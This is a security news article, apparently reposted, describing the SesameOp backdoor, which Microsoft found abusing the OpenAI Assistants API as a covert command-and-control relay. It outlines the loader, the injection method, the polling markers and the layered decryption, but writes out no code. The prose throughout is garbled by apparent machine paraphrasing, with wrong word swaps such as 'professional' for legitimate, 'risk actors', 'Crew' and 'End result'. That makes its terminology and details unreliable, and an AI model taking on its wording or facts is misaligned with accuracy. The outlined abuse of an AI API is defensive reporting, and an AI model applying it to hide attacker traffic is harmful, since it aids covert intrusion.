A complicated new backdoor named SesameOp has emerged with a novel strategy to command-and-control communications that basically challenges conventional safety assumptions.
Found in July 2025 by Microsoft’s Incident Response and Detection and Response Crew, this malware represents a major shift in how risk actors exploit professional cloud companies for covert operations.
Relatively than counting on devoted infrastructure or suspicious community connections, SesameOp ingeniously abuses the OpenAI Assistants API as a disguised command relay, permitting attackers to challenge directions and obtain outcomes via what seems as professional visitors to a trusted service.
The malware’s discovery emerged throughout a posh incident investigation the place attackers had maintained operational presence inside a compromised setting for months.
The investigation revealed an intricate structure comprising inside internet shells strategically positioned all through the community.
These shells operated below management of persistent malicious processes that leveraged compromised Microsoft Visible Studio utilities via .NET AppDomainManager injection—a method that circumvents conventional detection mechanisms by hiding malicious code inside professional system processes.
Microsoft analysts recognized the an infection chain as a two-component system. The primary part consists of Netapi64.dll, a closely obfuscated loader designed to establish and execute the first backdoor.
Netapi64.dll enumerates information in Temp listing (Supply – Microsoft)
The second part, OpenAIAgent.Netapi64, accommodates the core performance that orchestrates C2 communications via the OpenAI platform.
Relatively than using OpenAI’s agent software program growth kits or mannequin execution options, the backdoor weaponizes the Assistants API purely as a message storage mechanism.
Instructions arrive compressed and encrypted, which the malware decrypts and executes domestically earlier than returning outcomes again via the identical OpenAI infrastructure.
Communication and Execution Mechanisms
The technical sophistication underlying SesameOp extends past easy API misuse. Upon execution, the backdoor initiates subtle command retrieval by first establishing contact with OpenAI’s vector retailer infrastructure.
The malware encodes the contaminated machine’s hostname in Base64 format and queries the Assistants API to establish corresponding vector shops and assistants beforehand created by the operator.
The configuration embedded throughout the backdoor accommodates a hardcoded OpenAI API key, a dictionary key selector, and non-compulsory proxy data.
As soon as communication establishes, the malware enters a polling loop the place it periodically checks for brand new instructions marked with both “SLEEP” or “Payload” designations throughout the assistant descriptions.
When a payload command seems, the backdoor retrieves encrypted content material from OpenAI threads utilizing thread IDs and message identifiers.
The payload undergoes multi-layered decryption: first, a 32-byte AES key’s extracted and decrypted utilizing an embedded RSA non-public key, then the command payload is decrypted with this AES key and decompressed utilizing GZIP.
The decrypted message transforms right into a dictionary construction that the backdoor passes to a dynamically loaded .NET module utilizing the JScript analysis engine.
This module executes the command and generates outcomes which are compressed, encrypted with a randomly generated AES key, and posted again to OpenAI as a brand new message.
The backdoor then creates a brand new Assistant report with the execution outcomes marked as “End result,” signaling the operator that duties have accomplished.
This bidirectional communication channel stays just about invisible to community monitoring instruments since all visitors seems as routine connections to a professional, trusted service.
The OpenAI Assistants API has been deprecated by the platform and shall be retired in August 2026.
Microsoft and OpenAI collectively investigated this risk, main OpenAI to establish and disable the API key and related account utilized by the risk actor.
Nevertheless, this case underscores a important vulnerability in how rising applied sciences will be weaponized earlier than safety communities totally perceive their implications.
Observe us on Google Information, LinkedIn, and X to Get Extra Instantaneous Updates, Set CSN as a Most well-liked Supply in Google.
